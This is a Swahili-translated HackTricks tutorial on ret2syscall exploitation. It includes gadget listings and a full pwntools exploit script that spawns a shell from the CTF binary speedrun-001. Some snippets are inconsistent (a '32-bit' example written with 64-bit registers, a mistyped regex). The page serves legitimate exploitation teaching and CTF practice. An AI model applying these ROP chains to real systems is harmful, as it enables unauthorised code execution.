Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Ret2syscall

Ret2syscall

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Taarifa Msingi

Hii inafanana na Ret2lib, hata hivyo, katika kesi hii hatutaita kazi kutoka kwa maktaba. Katika kesi hii, kila kitu kitakuwa tayari kuita syscall sys_execve na baadhi ya hoja kutekeleza /bin/sh. Mbinu hii kawaida hutekelezwa kwenye faili za binary ambazo zimekamilishwa kistatiki, hivyo kunaweza kuwa na vifaa vingi na maagizo ya syscall.

Ili kuandaa wito kwa syscall inahitajika usanidi ufuatao:

  • rax: 59 Taja sys_execve

  • rdi: ptr kwa "/bin/sh" taja faili ya kutekeleza

  • rsi: 0 taja hakuna hoja zilizopitishwa

  • rdx: 0 taja hakuna mazingira ya mazingira yaliyopitishwa

Kwa hivyo, kimsingi ni lazima kuandika mfuatano /bin/sh mahali fulani na kisha kutekeleza syscall (ukiwa makini na kujaza inayohitajika kudhibiti steki). Kwa hili, tunahitaji kifaa cha kuandika /bin/sh katika eneo lililojulikana.

Syscall nyingine ya kuvutia ya kuita ni mprotect ambayo ingemruhusu mshambuliaji kurekebisha ruhusa ya ukurasa kwenye kumbukumbu. Hii inaweza kuunganishwa na ret2shellcode.

Vifaa vya Usajili

Tuanze kwa kutafuta jinsi ya kudhibiti vifaa hivyo:

ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret

Kwa anwani hizi ni inawezekana kuandika maudhui kwenye stack na kuzipakia kwenye rejista.

Andika string

Kumbukumbu inayoweza kuandikwa

Kwanza unahitaji kupata mahali pa kuandika kwenye kumbukumbu.

gef> vmmap
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]

Andika String kwenye kumbukumbu

Kisha unahitaji kupata njia ya kuandika maudhui yoyote kwenye anwani hii

ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx

Kiotomatiki ROP mnyororo

Amri ifuatayo inaunda mnyororo kamili wa sys_execve ROP ukipewa binary ya tuli wakati kuna vifaa vya andika-nini-popote na maagizo ya syscall:

ROPgadget --binary vuln --ropchain

Biti 32

'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''

rop += popRdx           # place value into EAX
rop += "/bin"           # 4 bytes at a time
rop += popRax           # place value into edx
rop += p32(0x6b6000)    # Writable memory
rop += writeGadget   #Address to: mov qword ptr [rax], rdx

rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget

Biti 64

'''
Lets write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx

Vifaa Vinavyokosekana

Ikiwa unakosa vifaa, kwa mfano kuandika /bin/sh kumbukumbu, unaweza kutumia mbinu ya SROP kudhibiti thamani zote za rejista (ikiwa ni pamoja na RIP na rejista za params) kutoka kwenye steki:

pageSROP - Sigreturn-Oriented Programming

```python from pwn import *

target = process('./speedrun-001') #gdb.attach(target, gdbscript = 'b *0x400bad')

Establish our ROP Gadgets

popRax = p64(0x415664) popRdi = p64(0x400686) popRsi = p64(0x4101f3) popRdx = p64(0x4498b5)

0x000000000048d251 : mov qword ptr [rax], rdx ; ret

writeGadget = p64(0x48d251)

Our syscall gadget

syscall = p64(0x40129c)

''' Here is the assembly equivalent for these blocks write "/bin/sh" to 0x6b6000

pop rdx, 0x2f62696e2f736800 pop rax, 0x6b6000 mov qword ptr [rax], rdx ''' rop = '' rop += popRdx rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end rop += popRax rop += p64(0x6b6000) rop += writeGadget

''' Prep the four registers with their arguments, and make the syscall

pop rax, 0x3b pop rdi, 0x6b6000 pop rsi, 0x0 pop rdx, 0x0

syscall '''

rop += popRax rop += p64(0x3b)

rop += popRdi rop += p64(0x6b6000)

rop += popRsi rop += p64(0) rop += popRdx rop += p64(0)

rop += syscall

Add the padding to the saved return address

payload = "0"*0x408 + rop

Send the payload, drop to an interactive shell to use our new shell

target.sendline(payload)

target.interactive()

## Mifano Mingine & Marejeo

* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
* Biti 64, hakuna PIE, nx, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo.
* [https://guyinatuxedo.github.io/07-bof\_static/bkp16\_simplecalc/index.html](https://guyinatuxedo.github.io/07-bof\_static/bkp16\_simplecalc/index.html)
* Biti 64, nx, hakuna PIE, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo. Ili kuandika kwenye steki kazi ya kufanya operesheni za hisabati inatumika vibaya
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals16\_feedme/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals16\_feedme/index.html)
* Biti 64, hakuna PIE, nx, BF canary, andika kwenye kumbukumbu fulani ROP ili kupiga simu kwa `execve` na ruka hapo.
PreviousRet2lib + Printf leak - arm64NextRet2syscall - ARM64

Last updated